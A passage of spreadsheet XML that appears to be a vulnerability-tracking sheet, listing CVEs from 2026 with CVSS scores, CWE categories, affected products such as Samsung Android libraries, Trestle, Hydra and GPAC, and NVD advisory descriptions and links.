          <t>NVD</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr"/>
      <c r="Q400" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in loading a subtitle frame in libsubextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21088</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21089</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in removing style tag in libsubextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21089</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21090</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsaviextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21090</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21091</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr"/>
      <c r="Q403" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libcodec2secevrcdec.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21091</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30512</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr"/>
      <c r="Q404" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability exists in the Restricted Access (Kiosk) Mode implementation of Scheidt &amp; Bachmann entervo HMI prior to V2 R5 P0 M5. The vulnerability affects the external PDF viewer functionality used to display the application manual and its interaction with the underlying Windows operating system. An authenticated low-privileged user can escape the kiosk environment by opening the application manual in the external PDF viewer and abusing the print functionality. Successful exploitation allows execution of arbitrary commands outside the kiosk environment with local administrator privileges.</t>
        </is>
      </c>
      <c r="S404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30512</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45200</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr"/>
      <c r="Q405" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>Software installed and run as a non-privileged user may conduct improper GPU driver IOCTL calls to create an allocation scenario that when freed would cause double free and kernel heap corruption.
Scenario caused by fabricating a specific combination of flags on the allocation interface that would cause an incorrect double free event when freed.</t>
        </is>
      </c>
      <c r="S405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45200</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49360</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr"/>
      <c r="Q406" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>Recce is a data-validation toolkit for enhanced dbt (data build tool) PR review. Prior to version 1.50.0, OSS server deployments that expose the server to an untrusted network without authentication are vulnerable to unauthenticated SQL execution through the query run API. When Recce is configured with a DuckDB-backed project, an attacker can use DuckDB filesystem primitives to read and write files accessible to the Recce server process. The impact depends on how Recce is deployed, but may include disclosure of local files, tampering with Recce/dbt artifacts, modification of browser-served static files leading to stored XSS, and modification of application files if those paths are writable. If Recce is run as root, file access occurs with root privileges inside that host or container. This issue has been patched in Recce `v1.50.0`. Users should upgrade to Recce `v1.50.0` or later. The patch restricts unsafe file read/write behavior for DuckDB-backed query execution and hardens the affected query path. Other warehouse adapters have also been reviewed for similar exposure. Users who cannot upgrade immediately should avoid exposing `recce server` to the public internet or any untrusted network. Recommended mitigations include enabling authentication or placing Recce behind an authenticated reverse proxy/VPN, running Recce as a non-root user, using a read-only application filesystem where possible, and ensuring that sensitive files or credentials are not available to the Recce process.</t>
        </is>
      </c>
      <c r="S406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49360</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52489</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr"/>
      <c r="Q407" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in gpac 31becc9e08b88e525a4a62013a4000de1c0f8fd9 allows an attacker to execute arbitrary code via the svgNameToImplementationName() function</t>
        </is>
      </c>
      <c r="S407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52489</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52492</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr"/>
      <c r="Q408" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libtiff rgb2ycbcr utility's cvtRaster() function when computing strip buffer sizes can result in an undersized heap allocation and subsequent heap-based buffer overflow during YCbCr conversion of a crafted TIFF image</t>
        </is>
      </c>
      <c r="S408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52492</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54757</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr"/>
      <c r="Q409" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, Trestle is vulnerable to server-side template injection that can lead to remote code execution. This occurs because the MDCleanInclude and MDSectionInclude Jinja2 tags re-parse untrusted Markdown content as template source code using a non-sandboxed jinja2.Environment. An attacker who controls content that Trestle renders, such as a crafted workspace Markdown file, a third-party SSP document, or a YAML lookup-table value, can inject a Jinja2 expression that traverses Python object internals to execute arbitrary operating system commands in the context of the Trestle process. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="S409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54757</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57170</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr"/>
      <c r="Q410" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions prior to 3.12.4 and 4.0.0 through 4.0.3, the custom Jinja2 include tags mdsection_include and md_clean_include re-parse the content of an included Markdown file as Jinja2 template code in a non-sandboxed environment, allowing server-side template injection that can lead to arbitrary code execution. The MDSectionInclude and MDCleanInclude tags in Trestle/core/jinja/tags.py pass included file content to Parser(self.environment, ...).parse(), splicing it into the host template's compilation, and the environment is a plain jinja2.Environment rather than a SandboxedEnvironment, so any expressions in the file are evaluated with full access to the usual SSTI gadget chain. Because Trestle's Markdown writers emit OSCAL prose and component-description fields verbatim, applying delimiter neutralization only to parameter tables, attacker-controlled OSCAL data such as a control statement, part prose, or component description containing Jinja2 syntax flows into an included Markdown file and is executed when the include tag re-parses it. This issue is fixed in version 4.1.0.</t>
        </is>
      </c>
      <c r="S410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57170</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68508</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr"/>
      <c r="Q411" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>Hydra is a framework for elegantly configuring complex applications. Prior to 1.3.4, hydra.utils.instantiate() resolves and calls Python objects selected by configuration through _resolve_target() in hydra/_internal/instantiate/_instantiate2.py, allowing attacker-controlled target values and arguments to choose dangerous callables. A consuming application, library, CLI workflow, or model loader that passes untrusted configuration, CLI overrides, or model metadata into hydra.utils.instantiate() can therefore execute arbitrary code in its own process, including reading or modifying files and credentials or terminating the process. Version 1.3.4 adds target blocking with an explicit HYDRA_INSTANTIATE_ALLOWLIST_OVERRIDE escape hatch. This issue is fixed in version 1.3.4.</t>
        </is>
      </c>
      <c r="S411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68508</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71382</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>adobe:substance_3d_sampler</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr"/>
      <c r="Q412" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>Substance3D - Sampler is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71382</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71613</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr"/>
      <c r="Q413" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the j2kdec_process() function. Fixed in 9a253a07fd3f6b48022bba74302bf39388dda859.</t>
        </is>
      </c>
      <c r="S413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71613</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78136</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-08-23</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr"/>
      <c r="Q414" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>chirpmyradio CHIRP before 39178db allows eval injection via crafted CSV data. This occurs in _clean_tmode in drivers/kenwood_itm.py.</t>
        </is>
      </c>
      <c r="S414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78136</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78482</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr"/>
      <c r="Q415" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R415"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S415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78482</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78484</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
